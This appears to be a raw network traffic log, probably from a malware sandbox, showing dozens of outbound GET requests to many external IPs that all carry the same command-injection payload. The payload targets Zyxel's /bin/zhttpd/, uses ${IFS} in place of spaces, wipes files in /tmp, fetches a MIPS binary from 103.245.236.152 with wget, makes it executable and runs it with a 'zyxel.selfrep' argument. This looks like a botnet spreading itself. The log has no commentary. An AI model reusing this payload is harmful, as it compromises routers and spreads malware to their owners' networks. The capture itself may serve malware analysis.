                                        Jan 14, 2024 16:18:38.301573038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2542192.168.2.1359950182.226.75.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301616907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2543192.168.2.1360378147.243.121.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301656961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2544192.168.2.1340824133.2.171.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301712036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2545192.168.2.1350724110.90.170.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301742077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2546192.168.2.133955440.123.171.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301784039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2547192.168.2.135548077.108.172.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301808119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2548192.168.2.1350214113.22.44.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301851034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2549192.168.2.1360860144.52.193.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301882982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2550192.168.2.133353062.246.10.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301954985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2551192.168.2.1340012152.49.210.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301986933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2552192.168.2.1354044218.137.107.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302012920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2553192.168.2.1359486183.164.158.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302038908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2554192.168.2.1341234219.18.92.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302108049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2555192.168.2.1337772178.255.215.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302144051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2556192.168.2.13457529.89.226.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302223921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2557192.168.2.1356056108.213.198.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302247047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2558192.168.2.1359182178.71.249.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302282095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2559192.168.2.133897034.200.27.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302324057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2560192.168.2.1336638191.7.66.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302344084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2561192.168.2.1334916123.145.129.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302397966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2562192.168.2.133824698.34.188.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302434921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2563192.168.2.1355884140.181.219.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302470922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2564192.168.2.134074847.108.28.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302499056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2565192.168.2.136041213.238.169.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302532911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2566192.168.2.1358606172.138.254.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302572966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2567192.168.2.1358698162.44.94.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302623987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2568192.168.2.1356846113.203.201.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302645922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2569192.168.2.133406414.226.245.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302686930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2570192.168.2.133717076.171.230.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302712917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2571192.168.2.1351314178.202.204.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302788019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2572192.168.2.133693851.44.144.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302830935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2573192.168.2.1357902207.253.102.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302859068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2574192.168.2.1353764155.93.162.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302908897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2575192.168.2.1353600124.29.122.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302942038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2576192.168.2.1339384120.31.175.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.302999973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2577192.168.2.1348412203.75.7.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303029060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2578192.168.2.133959434.47.66.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303097010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2579192.168.2.1342856102.113.85.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303133011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2580192.168.2.135745637.164.234.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303183079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2581192.168.2.1333698135.165.127.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303225040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2582192.168.2.1357330193.10.36.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303261042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2583192.168.2.134786812.148.183.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303292990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2584192.168.2.133337483.244.254.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303352118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2585192.168.2.1347666211.55.209.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303374052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2586192.168.2.134756460.181.244.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303428888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2587192.168.2.1360464200.216.47.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303453922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2588192.168.2.1334910118.16.65.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303515911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2589192.168.2.13544348.64.147.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303565979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2590192.168.2.13370208.18.74.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303599119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2591192.168.2.1360120179.158.217.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303664923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2592192.168.2.135597824.152.246.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303714037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2593192.168.2.1358362102.27.82.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303747892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2594192.168.2.1353476104.224.65.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303813934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2595192.168.2.1355502177.77.186.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303848982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2596192.168.2.134775613.146.123.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303900957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2597192.168.2.1341816161.166.199.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303958893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2598192.168.2.136098475.57.181.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.303994894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2599192.168.2.1344184112.227.141.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304034948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2600192.168.2.134896643.104.109.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304078102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2601192.168.2.133397846.247.110.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304135084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2602192.168.2.134610291.121.235.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304167032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2603192.168.2.135102862.36.123.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.304202080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2604192.168.2.134890065.169.166.24443
                                        TimestampBytes transferredDirectionData
